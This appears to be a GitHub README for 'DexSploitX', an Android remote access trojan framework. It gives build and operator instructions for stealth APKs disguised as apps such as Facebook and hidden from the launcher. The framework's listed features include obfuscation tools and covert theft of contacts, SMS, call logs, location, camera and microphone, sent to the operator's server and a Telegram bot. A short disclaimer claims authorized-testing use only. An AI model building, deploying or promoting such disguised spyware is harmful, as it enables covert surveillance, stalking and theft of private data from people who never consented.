Professional Android Remote Access Tool for Authorized Security Testing
Features • Installation • Usage • Documentation • Legal
DexSploitX is a powerful Android Remote Access Tool (RAT) framework designed for professional penetration testers and security researchers. It provides comprehensive remote access capabilities for authorized security assessments on Android devices running versions 5.0 through 16 (API 21-36).
- Zero Configuration APK Builder - Interactive builder with custom branding
- Multi-Device Management - Handle multiple connected devices simultaneously
- Telegram Integration - Auto-dump data to Telegram for remote operations
- Stealth Operations - Hide app from launcher, custom icons, package names
- Advanced Permissions - Granular permission selection (13+ permissions)
- Live Monitoring - Real-time SMS, location, camera, and audio streaming
- File Operations - Upload/download files, directory browsing
- Code Protection - Built-in obfuscation tools included
- Interactive Configuration - Easy-to-use command-line interface
- Custom Branding - Change app name, package, icon, and website
- IP/Port Configuration - Automatic server endpoint configuration
- Permission Selection - Choose exactly which permissions to request
- Stealth Mode - Hide app from launcher (no icon)
- Telegram Auto-Dump - Configure Telegram bot for data exfiltration
- Automatic Signing - Built-in APK signing with keystore management
- Device Information - Complete device specs and system info
- Contact Access - Extract all contacts with details
- Call Logs - View complete call history
- SMS Management - Read all messages + live SMS monitoring
- Location Tracking - GPS location with live updates
- Camera Streaming - Live camera feed (front/back)
- Audio Recording - Live microphone streaming
- File Management - Browse, upload, download files
- App List - View all installed applications
- Vibration Control - Remote device vibration
- Sound Playback - Play audio URLs remotely
- Multi-Session Management - Handle multiple devices
- Telegram Integration - Auto-send data to Telegram bot
- HTTP Server - Built-in web interface for camera/audio
- Persistent Connections - Auto-reconnect on disconnect
- Data Logging - Automatic file saving for all data
- Professional UI - Clean command-line interface
Building APKs on Termux has known compatibility issues due to aapt2 binary incompatibility on aarch64 architecture.
Recommended Workflow:
- Build APKs on PC (Windows/Linux/Mac) - Fast and stable
- Run Server on Termux (Android device) - Portable and convenient
See TERMUX_SETUP.md for detailed Termux instructions.
# Required
- Python 3.8 or higher
- Java JDK 8 or higher
- Android SDK (for apksigner/zipalign)
# Optional
- Pillow (for icon customization)
- PyArmor (for advanced obfuscation)# Clone repository
git clone https://github.com/offsecnight/DexSploitX.git
cd DexSploitX
# Install dependencies
pip install -r requirements.txt
# Download apktool
cd Builder
wget https://github.com/iBotPeaches/Apktool/releases/download/v2.9.3/apktool_2.9.3.jar -O apktool.jar# Install Termux from F-Droid
# Then run:
pkg update && pkg upgrade -y
pkg install -y python git
git clone https://github.com/offsecnight/DexSploitX.git
cd DexSploitX
pip install -r requirements.txt
# Start server
python DexSploitX.py -i 0.0.0.0 -p 8080cd Builder
python build.pyConfiguration Options:
- Server IP and Port
- App Name and Package
- Website URL
- Custom Icon
- Telegram Bot Token & Chat ID
- Hide App Option
- Permission Selection
Example:
[?] Server IP: 192.168.1.100
[?] Server Port: 4444
[?] App Name: Facebook
[?] Package: com.social.app
[?] Enable Telegram auto-dump? (y/n): y
[?] Telegram Bot Token: 123456:ABC-DEF...
[?] Telegram Chat ID: 987654321
[?] Hide app from launcher? (y/n): y
python DexSploitX.py -i 0.0.0.0 -p 4444Transfer the APK from APK/ folder to target device and install.
DexSploitX > sessions # List connected devices
DexSploitX > session DEVICE_NAME # Select device
DexSploitX (DEVICE) > help # Show available commandssessions # List all connected devices
session <name> # Connect to specific device
back # Return to main menu
deviceinfo # Show device information
exit # Exit DexSploitXcontacts # Extract all contacts
calllogs # Get call history
sms # Read all SMS messages
applist # List installed apps
location # Get current GPS locationlivesms # Start live SMS monitoring
stoplive # Stop live SMS monitoring
camstream [back|front] # Start camera stream
stopstream # Stop camera stream
liveaudio # Start audio recording
stopaudio # Stop audio recordingls [path] # List directory contents
pwd # Show current directory
cd <path> # Change directory
dump <file> # Download file
cat <file> # View file contents
storage # Show storage info
upload <file> # Upload file to device
dumpdir <path> # Download entire directoryvibrate [duration] # Vibrate device (ms)
playsound <url> # Play audio from URL
stopsound # Stop audio playbackdump-tg-bot <token> [chat_id] # Configure Telegram botDexSploitX supports automatic data exfiltration to Telegram:
- Create Bot: Message @BotFather on Telegram
- Get Token: Copy the bot token (format:
123456:ABC-DEF...) - Get Chat ID: Message @userinfobot to get your chat ID
[?] Enable Telegram auto-dump? (y/n): y
[?] Telegram Bot Token: YOUR_BOT_TOKEN
[?] Telegram Chat ID: YOUR_CHAT_IDDexSploitX > dump-tg-bot YOUR_BOT_TOKEN YOUR_CHAT_IDAuto-Dump Features:
- Contacts → Sent as document
- Call Logs → Sent as document
- SMS Messages → Sent as document
- App List → Sent as document
- Files → Sent as document
- Live SMS → Instant notification
- Location → Real-time updates
DexSploitX/
├── DexSploitX.py # Main server
├── config.json # Telegram configuration
├── requirements.txt # Python dependencies
├── obfuscate_simple.py # Simple obfuscator
├── obfuscate.py # PyArmor obfuscator
├── README.md # This file
├── LICENSE # License file
├── DOCUMENTATION.md # Detailed documentation
├── Builder/
│ ├── build.py # APK builder
│ ├── apktool.jar # APK decompiler
│ ├── facebook.png # Default icon
│ └── stub/ # Pre-built APK stub
│ ├── AndroidManifest.xml
│ ├── res/ # Resources
│ └── smali/ # Decompiled code
├── keystore/
│ └── keystore # APK signing keystore
├── APK/ # Built APKs output
└── devices/ # Collected data storage
└── DEVICE_NAME/
├── contacts.txt
├── calllogs.txt
├── sms_complete.txt
├── applist.txt
├── camera_frames/
└── audio/
- Complete Documentation - Full feature documentation
- Obfuscation Guide - Code protection guide
- API Reference - Developer API documentation
- Installation & Setup
- Building Custom APKs
- Multi-Device Management
- Telegram Integration
- Advanced Features
keytool -genkey -v \
-keystore keystore/keystore \
-alias key0 \
-keyalg RSA \
-keysize 2048 \
-validity 10000Replace Builder/stub/ with your own decompiled APK for custom base.
Edit config.json for persistent Telegram settings:
{
"telegram_bot_token": "YOUR_TOKEN",
"telegram_chat_id": "YOUR_CHAT_ID"
}- Ensure Java is installed:
java -version - Check apktool.jar exists in Builder/
- Verify stub/ directory is complete
- Check firewall allows port
- Verify IP address is correct
- Ensure device has internet connection
- Grant all requested permissions manually
- Check Android version compatibility
- Disable battery optimization
- Verify bot token is correct
- Check chat ID is valid
- Ensure bot can send messages to you
Contributions are welcome! Please follow these guidelines:
- Fork the repository
- Create feature branch (
git checkout -b feature/AmazingFeature) - Commit changes (
git commit -m 'Add AmazingFeature') - Push to branch (
git push origin feature/AmazingFeature) - Open Pull Request
- ✅ Complete rewrite with modern architecture
- ✅ Telegram integration for data exfiltration
- ✅ Interactive APK builder with all options
- ✅ Support for Android 5.0 - 16
- ✅ Live SMS and location monitoring
- ✅ Camera and audio streaming
- ✅ Multi-device session management
- ✅ Code obfuscation tools included
- ✅ Professional UI and branding
- Basic RAT functionality
- Single device support
- Manual configuration
READ CAREFULLY BEFORE USE
This tool is provided for EDUCATIONAL and AUTHORIZED SECURITY TESTING PURPOSES ONLY.
- ✅ Penetration testing with written authorization
- ✅ Security research on owned devices
- ✅ Educational purposes in controlled environments
- ✅ Red team operations with proper authorization
- ❌ Unauthorized access to devices
- ❌ Surveillance without consent
- ❌ Any illegal activities
- ❌ Violation of privacy laws
- YOU are solely responsible for your actions
- YOU must comply with all applicable laws
- YOU must obtain proper authorization before use
- YOU accept all legal consequences of misuse
The developer (NIGHTKING) assumes NO RESPONSIBILITY for:
- Misuse of this tool
- Damage caused by this tool
- Legal consequences of unauthorized use
- Violation of laws or regulations
By using DexSploitX, you agree to:
- Use only for authorized and legal purposes
- Obtain written permission before testing
- Comply with all applicable laws and regulations
- Accept full responsibility for your actions
- Not hold the developer liable for any consequences
UNAUTHORIZED ACCESS TO COMPUTER SYSTEMS IS ILLEGAL
Violations may result in:
- Criminal prosecution
- Civil lawsuits
- Imprisonment
- Heavy fines
USE AT YOUR OWN RISK
- Name: NIGHTKING
- GitHub: @offsecnight
- Repository: DexSploitX
- Issues: GitHub Issues
- Discussions: GitHub Discussions
- Wiki: Project Wiki
- Join our community for updates and support
- Share your experiences and improvements
- Report bugs and request features
This project is licensed under the Educational Use License.
See LICENSE file for details.
Key Points:
- Free for educational and research purposes
- Requires authorization for penetration testing
- No warranty provided
- Developer not liable for misuse
- Android Security Community
- Penetration Testing Community
- Open Source Contributors
- Security Researchers Worldwide
⭐ Star this repository if you find it useful!
Made with ❤️ by NIGHTKING
For Authorized Security Testing Only